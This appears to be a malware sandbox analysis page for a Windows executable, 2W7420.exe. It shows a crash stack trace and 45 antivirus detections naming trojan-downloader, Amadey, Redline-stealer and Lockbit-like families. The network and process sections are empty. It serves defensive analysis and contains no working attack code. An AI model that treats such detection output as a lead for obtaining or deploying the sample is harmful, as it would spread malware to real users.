__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 55 89 04 24 54 58 05 04 exception.symbol: 2w7420+0x1e24b9 exception.instruction: in eax, dx exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1975481 exception.address: 0x14d24b9 registers.esp: 4062844 registers.edi: 134889 registers.eax: 1447909480 registers.ebp: 4010274836 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 21824621 registers.ecx: 20	1	0	0

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectMalware
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojandownloader.Deyma
Skyhigh	BehavesLike.Win32.Lockbit.vc
ALYac	Gen:Variant.Symmi.93663
Cylance	Unsafe
VIPRE	Gen:Variant.Doina.48214
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (D)
K7GW	Trojan ( 005aad751 )
K7AntiVirus	Trojan ( 005aad751 )
Baidu	Win32.Trojan.Delf.in
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
APEX	Malicious
Avast	Win32:MalwareX-gen [Adw]
Kaspersky	UDS:Trojan-Downloader.Win32.Deyma.gen
NANO-Antivirus	Trojan.Win32.Deyma.kwwbbz
MicroWorld-eScan	Gen:Variant.Doina.48214
Rising	Trojan.Agent!1.12B48 (CLASSIC)
F-Secure	Trojan.TR/Redcap.tclid
DrWeb	Trojan.Packed2.48355
Zillya	Trojan.AgentGen.Win32.94
TrendMicro	Trojan.Win32.AMADEY.YXFDOZ
Trapmine	malicious.moderate.ml.score
Sophos	Troj/Amadey-O
SentinelOne	Static AI - Malicious SFX
Google	Detected
Avira	TR/Redcap.tclid
Antiy-AVL	Trojan[Downloader]/Win32.Deyma
Gridinsoft	Spy.Win32.Redline.lu!heur
Microsoft	Trojan:Win32/Multiverze!rfn
ZoneAlarm	Troj/Amadey-O
Varist	W32/Kryptik.JKR.gen!Eldorado
McAfee	Artemis!3EC886E81B3A
Malwarebytes	Malware.AI.3966811931
Ikarus	Trojan.MSIL.Disabler
Zoner	Probably Heur.ExeHeaderL
TrendMicro-HouseCall	Trojan.Win32.VSX.PE04C9V
Tencent	Malware.Win32.Gencirc.146b1fd4
huorong	Trojan/Generic!23958BC2A306C122
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Amadey.A!tr.dldr
AVG	Win32:MalwareX-gen [Adw]

download.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All